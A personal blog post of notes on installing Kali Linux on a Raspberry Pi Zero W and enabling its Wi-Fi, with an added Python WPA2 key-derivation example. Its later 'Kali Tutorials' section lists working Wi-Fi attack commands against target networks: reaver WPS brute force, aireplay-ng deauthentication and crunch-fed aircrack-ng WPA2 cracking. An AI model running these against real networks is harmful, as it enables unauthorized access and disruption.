Sep 18, 2017

raspi0w + kali linux + how to enable wi-fi card


Kali Linux download site for the Raspberry Pi

https://www.offensive-security.com/kali-linux-arm-images/

Below are the steps to take when the built-in Wi-Fi device (wlan0) is not recognized.


1)I installed kali on the sd card.

2)put the sd card in another pi using a usb to microsd adapter
 (insert the SD card into another, already booted Raspbian (Pi) environment)

3)Then mount the 2 partitions from the card under /mnt and /mnt/boot
 mount /dev/sda2 /mnt/
 mount /dev/sda1 /mnt/boot/

4)rpi-update the kali image
 ROOT_PATH=/mnt BOOT_PATH=/mnt/boot rpi-update

5)change root to the kali image
 chroot /mnt/ /bin/bash

6)update the thing
 apt-get update
 apt-get upgrade

7)install the wireless driver
 apt-get install firmware-brcm80211

 Note: in my environment this gave a "404  Not Found" error,
   but wlan0 still ended up working in the end.

8)copy /lib/firmware/brcm/brcmfmac43430-sdio.txt from a raspbian image to /lib/firmware/brcm/brcmfmac43430-sdio.txt on kali

9)edit /etc/network/interfaces
 auto wlan0
 iface wlan0 inet dhcp
 wpa-ssid "mysupercoolssidofdoom"
 wpa-psk "mysupercoolpasswordofdoom"

10)exit the chroot, umount the partitions and eject the card

"That will get you kali on the pi zero w with wireless networking. But I cannot get bluetooth to work, and I soooooooo want to use my bluetooth keyboard with it. Sorry about my formatting typing this on my phone."
So says the original poster.
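
Step 9 stores the Wi-Fi passphrase in clear text in /etc/network/interfaces. The following Python example is added here and is not part of the forum post or of this blog's notes. It derives the 256-bit WPA2 key from the SSID and passphrase (PBKDF2-HMAC-SHA1, 4096 iterations, as defined in IEEE 802.11i) and builds the same stanza with that key, assuming the Debian wpasupplicant ifupdown hook, which accepts a 64-hex-digit key in wpa-psk. The function names are hypothetical.

```python
# Added example (not from the original post): WPA2-PSK key derivation for
# the wpa-ssid / wpa-psk lines of /etc/network/interfaces.
import hashlib
import os
import stat


def derive_psk(ssid: str, passphrase: str) -> str:
    """Return the 256-bit WPA/WPA2 pre-shared key as 64 hex digits.

    IEEE 802.11i: PSK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096, 32 bytes).
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 characters")
    ssid_bytes = ssid.encode("utf-8")
    if not 1 <= len(ssid_bytes) <= 32:
        raise ValueError("SSID must be 1..32 bytes")
    key = hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid_bytes, 4096, 32)
    return key.hex()


def interfaces_stanza(iface: str, ssid: str, passphrase: str) -> str:
    """Build the step-9 stanza with the derived key in place of the passphrase."""
    # Assumption: the ifupdown hook treats a bare 64-hex-digit wpa-psk as a raw key.
    return (
        f"auto {iface}\n"
        f"iface {iface} inet dhcp\n"
        f' wpa-ssid "{ssid}"\n'
        f" wpa-psk {derive_psk(ssid, passphrase)}\n"
    )


def readable_by_others(path: str) -> bool:
    """True if group or other can read the file that holds the key."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))


if __name__ == "__main__":
    # Sample values taken from step 9 of the post.
    print(interfaces_stanza("wlan0", "mysupercoolssidofdoom", "mysupercoolpasswordofdoom"))
```

The derived key still grants access to that one SSID, so the file holding it should be mode 600; unlike the passphrase, it does not reveal a password that may be reused elsewhere.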

References

・Re: Kali Linux Raspberry Pi Zero W - bluetooth (03/18)
 https://www.raspberrypi.org/forums/viewtopic.php?t=177530#p1133241
 The steps above are almost a verbatim copy of this post.

・How To Set Up Kali Linux on the New $10 Raspberry Pi Zero W (07/22)
 https://null-byte.wonderhowto.com/how-to/set-up-kali-linux-new-10-raspberry-pi-zero-w-0176819/
 Looks interesting, so I want to read it later.

・Re4son-Kernel for Raspberry Pi 1/2/3/Zero/Zero W (09/01)
 https://whitedome.com.au/re4son/re4son-kernel/
 Distribution site for precompiled kernels.

-- Added 2018.05.01 -->

Kali Tutorials


---

5 Steps Wi-Fi


1.airmon-ng
2.airmon-ng stop wlan0
3.airodump-ng wlan0

|Information:
|
| BSSID (Basic Service Set Identification): the MAC address of access point
| Beacons: Number of announcement packets sent by the AP
| #Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
| #/s: Number of data packets per second measured over the last 10 seconds.
| MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.
| CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.
| ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.

4.wash -i wlan0 -c "target channel" -C -s
  if the WPS Locked status is No, then we are ready to move to step 5.
5.reaver -i wlan0 -b "target mac" --fail-wait=360

---
breaking wpa2-psk (2016/02/21)

airodump-ng wlan0 --bssid "target mac" --channel "target channel" -w "target ap"

aireplay-ng --deauth 20 -a "target mac" wlan0

crunch 20 20 0123456789abcdefghijklmnopqrstuvwxyz | aircrack-ng -b "target mac" -x1 -y -w - "target ap".cap

WPA2 Brute Force
> ./crunch 8 8 1234567890abcdefghijklmnopqrstuvwxyz -t passw@@@| aircrack-ng -b  And Target BSSID

Aircrack can't take dictionary from stdin?
> echo mywpapassword | aircrack-ng -w - -e devnetwork /tmp/captures.cap

---
HowTo : Pause/Resume Aircrack-ng

where files are saved in the session? #234 (2015/03/29)
> /usr/local/etc/reaver/ or /etc/reaver/

reaver resume from certain pin nr. #233 (2015/03/29)

